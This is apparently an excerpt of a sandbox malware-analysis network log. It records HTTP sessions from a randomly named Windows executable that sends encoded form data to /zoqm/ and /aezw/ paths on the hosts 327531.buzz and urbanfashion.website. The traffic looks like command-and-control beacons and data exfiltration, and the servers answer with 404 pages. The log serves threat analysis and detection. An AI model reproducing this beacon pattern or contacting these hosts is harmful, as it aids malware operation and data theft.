                                                                                                                                                Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                                                Nov 25, 2024 09:44:28.762573004 CET448INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                                                                Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                                                                                                                Nov 25, 2024 09:44:28.762603998 CET250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                                                                                                                                Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                29192.168.2.44997843.199.54.158803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:34.239140987 CET777OUTPOST /zoqm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.327531.buzz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.327531.buzz
                                                                                                                                                Referer: http://www.327531.buzz/zoqm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 64 6f 63 6c 47 74 31 6b 2f 77 64 6f 79 6c 4f 73 37 32 55 38 55 45 66 4d 54 54 38 6f 4b 56 36 74 41 46 37 42 39 33 6f 58 54 79 52 44 38 37 6c 49 78 73 70 35 56 69 57 69 31 73 51 6f 34 58 76 62 48 56 6c 55 46 78 62 6b 46 2b 68 6e 46 4c 6c 4a 4b 41 59 42 32 2f 50 2b 77 43 30 6b 2b 74 50 76 31 63 67 73 38 36 34 48 44 32 4c 72 54 68 41 79 70 72 61 32 71 44 64 41 78 59 4e 42 43 36 55 38 4f 6d 64 56 6e 4b 38 52 39 78 73 74 76 5a 70 79 76 65 50 33 74 37 5a 58 46 31 57 69 4e 31 48 6a 76 56 32 62 33 58 4f 54 56 4e 52 41 47 7a 67 6d 31 56 77 6e 62 57 38 6a 50 4c 54 77 42 47 78 33 61 51 3d 3d
                                                                                                                                                Data Ascii: ifzt=doclGt1k/wdoylOs72U8UEfMTT8oKV6tAF7B93oXTyRD87lIxsp5ViWi1sQo4XvbHVlUFxbkF+hnFLlJKAYB2/P+wC0k+tPv1cgs864HD2LrThAypra2qDdAxYNBC6U8OmdVnK8R9xstvZpyveP3t7ZXF1WiN1HjvV2b3XOTVNRAGzgm1VwnbW8jPLTwBGx3aQ==


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                30192.168.2.44998643.199.54.158803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:36.903022051 CET797OUTPOST /zoqm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.327531.buzz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.327531.buzz
                                                                                                                                                Referer: http://www.327531.buzz/zoqm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 64 6f 63 6c 47 74 31 6b 2f 77 64 6f 78 46 2b 73 6f 46 38 38 53 6b 66 4e 57 54 38 6f 42 31 36 68 41 46 33 42 39 32 39 4b 54 41 31 44 38 61 31 49 77 74 70 35 5a 43 57 69 74 63 51 70 6c 48 76 51 48 55 59 70 46 30 6a 6b 46 2b 6c 6e 46 50 68 4a 4b 78 59 43 33 76 50 77 38 69 30 69 77 4e 50 76 31 63 67 73 38 36 74 6f 44 32 54 72 55 56 38 79 70 4b 61 31 69 6a 64 48 34 34 4e 42 55 4b 55 34 4f 6d 64 6e 6e 4f 38 33 39 79 55 74 76 63 74 79 76 50 4f 46 6e 37 5a 56 61 46 58 6a 48 58 69 48 33 56 7a 37 2b 55 76 79 66 59 31 4d 48 31 74 38 6b 6b 52 77 4a 57 59 51 53 4d 61 45 4d 46 4d 2b 42 51 36 4d 71 57 54 37 77 4d 4e 35 2b 31 36 4b 72 75 49 79 42 71 73 3d
                                                                                                                                                Data Ascii: ifzt=doclGt1k/wdoxF+soF88SkfNWT8oB16hAF3B929KTA1D8a1Iwtp5ZCWitcQplHvQHUYpF0jkF+lnFPhJKxYC3vPw8i0iwNPv1cgs86toD2TrUV8ypKa1ijdH44NBUKU4OmdnnO839yUtvctyvPOFn7ZVaFXjHXiH3Vz7+UvyfY1MH1t8kkRwJWYQSMaEMFM+BQ6MqWT7wMN5+16KruIyBqs=
                                                                                                                                                Nov 25, 2024 09:44:38.460024118 CET390INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:38 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                31192.168.2.44999343.199.54.158803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:39.572726965 CET10879OUTPOST /zoqm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.327531.buzz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.327531.buzz
                                                                                                                                                Referer: http://www.327531.buzz/zoqm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 64 6f 63 6c 47 74 31 6b 2f 77 64 6f 78 46 2b 73 6f 46 38 38 53 6b 66 4e 57 54 38 6f 42 31 36 68 41 46 33 42 39 32 39 4b 54 41 39 44 2f 6f 74 49 77 4f 78 35 58 69 57 69 7a 73 51 53 6c 48 76 4e 48 56 78 75 46 30 66 53 46 39 4e 6e 58 38 35 4a 64 7a 38 43 38 76 50 77 30 43 30 6e 2b 74 4f 6c 31 59 38 6f 38 36 39 6f 44 32 54 72 55 55 73 79 75 62 61 31 76 44 64 41 78 59 4e 46 43 36 55 51 4f 6d 46 33 6e 4f 6f 34 2b 44 30 74 76 38 39 79 73 39 6d 46 6b 62 5a 54 62 46 57 77 48 58 65 59 33 56 76 4a 2b 56 4b 6e 66 65 4a 4d 44 69 64 6b 30 6d 42 54 64 68 67 77 4e 2b 65 6d 43 6c 77 68 4b 68 47 41 69 6e 7a 50 69 39 38 62 30 48 53 61 36 73 63 6c 41 73 4d 77 4d 61 36 2f 34 46 63 4a 47 31 4f 72 72 58 45 68 43 39 42 50 55 61 31 44 41 2b 57 38 71 71 43 6f 76 55 6b 58 45 74 61 4f 52 57 72 6a 38 46 62 49 30 34 52 38 76 4c 51 56 59 4e 70 7a 68 64 51 73 44 56 73 67 57 79 31 39 32 58 55 4a 7a 41 63 34 79 66 6e 59 44 50 46 66 4c 39 56 44 6d 75 52 6c 7a 54 38 67 62 6d 54 44 74 6b 61 7a 75 55 64 4a 2f 44 75 51 35 [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=doclGt1k/wdoxF+soF88SkfNWT8oB16hAF3B929KTA9D/otIwOx5XiWizsQSlHvNHVxuF0fSF9NnX85Jdz8C8vPw0C0n+tOl1Y8o869oD2TrUUsyuba1vDdAxYNFC6UQOmF3nOo4+D0tv89ys9mFkbZTbFWwHXeY3VvJ+VKnfeJMDidk0mBTdhgwN+emClwhKhGAinzPi98b0HSa6sclAsMwMa6/4FcJG1OrrXEhC9BPUa1DA+W8qqCovUkXEtaORWrj8FbI04R8vLQVYNpzhdQsDVsgWy192XUJzAc4yfnYDPFfL9VDmuRlzT8gbmTDtkazuUdJ/DuQ5vP9HaZ4uosfTE/MaIrDPxZeYyCgw2U+1txANW981jniKSPnNocwxsQGmLESmhaU0mI9XlptTB1c1pUHIti69iRcwh0JK+Q3dA8ImYTl0xfM9Nk9fc3TMm1s3R0kvPF6nXmvNU5o1CeqWWUta1kNzRDE1CqZuC/DGEuC1ZhFb69MjS/YFruBJKh3397YAEc7NU+Cg+Pwvx3nOD64LCcSqwqJ32HMQVJ4RhUULEnRddFEewkn1awM5KGrMkoTxQO4uhn/Lcm92taYoBINE4VmCuTTc5k6iHF4WPfoFDsZEU4955ORj/z31HFf7r65PUdHhitW+qcXwjjHryLay2WN9UcoSgeg2bp3lNNccwuenCdR1bCb0S3xsIwm0ApPKeq+Q17EbV5x54yzlU6kwc1klr8EkZ4OQjuoDAaPmCA1C979bWYSotcUbGt4fzbYlxHVP5iCetRugL8l2mzZgzbwmdlCXfuN3qX9dtoolG2xbYb2XHEGUf8ulc67Je+buRZw0avOVpb547/FLE/FzfjlXHwE0zExtYYQaPp88/iVm7DcBEne01/sJ2fuIHy8xJZJnNz3t5ID+ujudgbihbWiCxkGniqkaAomQoENXzkTP4TgVHAT1pwQC1ifmRwT18E6JFWJ4/yBmn+AY7fKaJE5Ut5yQE+TGB3PL6V [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:44:41.115652084 CET390INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:40 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                32192.168.2.44999943.199.54.158803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:42.262790918 CET515OUTGET /zoqm/?qX=qP0hoZO0bjg4&ifzt=Qq0FFa8OkDRPhmjT0VM8NDOXfTRiFF6zBHj2iH9IdxJy16x8x8AWanWvy54Dx3T7LlN6VBvxFf1wAvhvFTk518nT82cv2sbx2pE2mKVvPmrAc0IY36SOsAA= HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.327531.buzz
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:44:43.814791918 CET729INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:43 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                33192.168.2.450015209.74.77.108803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:49.380299091 CET804OUTPOST /aezw/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.urbanfashion.website
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.urbanfashion.website
                                                                                                                                                Referer: http://www.urbanfashion.website/aezw/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 61 50 30 32 58 77 37 78 55 54 4c 78 6f 70 67 58 67 55 69 41 32 68 63 30 6c 79 34 49 59 6f 38 6f 36 31 57 36 45 52 53 69 45 42 4b 32 4c 6a 63 46 45 44 6b 39 71 76 45 66 74 64 62 42 32 53 4d 4e 54 4b 4c 75 77 75 57 44 77 36 6a 4a 55 43 73 37 77 68 36 67 70 41 37 74 44 62 65 2b 74 34 57 73 4a 53 47 6a 67 37 44 51 6b 32 73 59 2f 2f 71 37 33 4e 34 66 48 6d 35 50 2f 77 5a 50 77 30 56 70 4e 56 6e 74 6b 73 4a 58 75 34 6c 49 37 5a 73 6a 4d 69 6a 65 78 64 59 79 43 49 53 79 46 65 61 44 6e 59 31 56 5a 59 30 4a 43 58 32 4a 52 76 4a 4d 71 4d 59 38 79 59 58 32 73 35 47 6d 44 67 76 70 48 67 3d 3d
                                                                                                                                                Data Ascii: ifzt=aP02Xw7xUTLxopgXgUiA2hc0ly4IYo8o61W6ERSiEBK2LjcFEDk9qvEftdbB2SMNTKLuwuWDw6jJUCs7wh6gpA7tDbe+t4WsJSGjg7DQk2sY//q73N4fHm5P/wZPw0VpNVntksJXu4lI7ZsjMijexdYyCISyFeaDnY1VZY0JCX2JRvJMqMY8yYX2s5GmDgvpHg==
                                                                                                                                                Nov 25, 2024 09:44:50.674333096 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:50 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Length: 389
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                34192.168.2.450022209.74.77.108803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:52.039508104 CET824OUTPOST /aezw/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.urbanfashion.website
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.urbanfashion.website
                                                                                                                                                Referer: http://www.urbanfashion.website/aezw/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 61 50 30 32 58 77 37 78 55 54 4c 78 71 4d 77 58 73 58 36 41 2b 68 63 33 37 43 34 49 53 49 38 73 36 31 71 36 45 51 6e 35 45 79 69 32 4b 47 34 46 43 79 6b 39 74 76 45 66 6d 39 62 41 6f 69 4d 77 54 4b 32 5a 77 76 71 44 77 36 33 4a 55 44 63 37 73 47 4f 76 72 51 37 76 59 72 65 38 70 34 57 73 4a 53 47 6a 67 37 2b 59 6b 32 30 59 2f 4f 61 37 30 73 34 63 4e 47 35 49 32 51 5a 50 6a 6b 55 42 4e 56 6e 4c 6b 75 39 35 75 37 4e 49 37 59 38 6a 4e 7a 6a 52 69 39 59 4f 4d 6f 54 2b 4f 72 6a 38 6e 49 77 35 5a 72 4d 6c 63 46 2b 6f 64 4a 45 57 37 39 35 72 67 59 7a 46 78 2b 50 53 4f 6a 53 67 63 76 6f 6e 32 75 5a 33 52 48 32 2b 51 50 55 62 64 76 78 4c 39 42 38 3d
                                                                                                                                                Data Ascii: ifzt=aP02Xw7xUTLxqMwXsX6A+hc37C4ISI8s61q6EQn5Eyi2KG4FCyk9tvEfm9bAoiMwTK2ZwvqDw63JUDc7sGOvrQ7vYre8p4WsJSGjg7+Yk20Y/Oa70s4cNG5I2QZPjkUBNVnLku95u7NI7Y8jNzjRi9YOMoT+Orj8nIw5ZrMlcF+odJEW795rgYzFx+PSOjSgcvon2uZ3RH2+QPUbdvxL9B8=
                                                                                                                                                Nov 25, 2024 09:44:53.337768078 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:53 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Length: 389
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                35192.168.2.450030209.74.77.108803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:54.698921919 CET10906OUTPOST /aezw/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.urbanfashion.website
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.urbanfashion.website
                                                                                                                                                Referer: http://www.urbanfashion.website/aezw/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
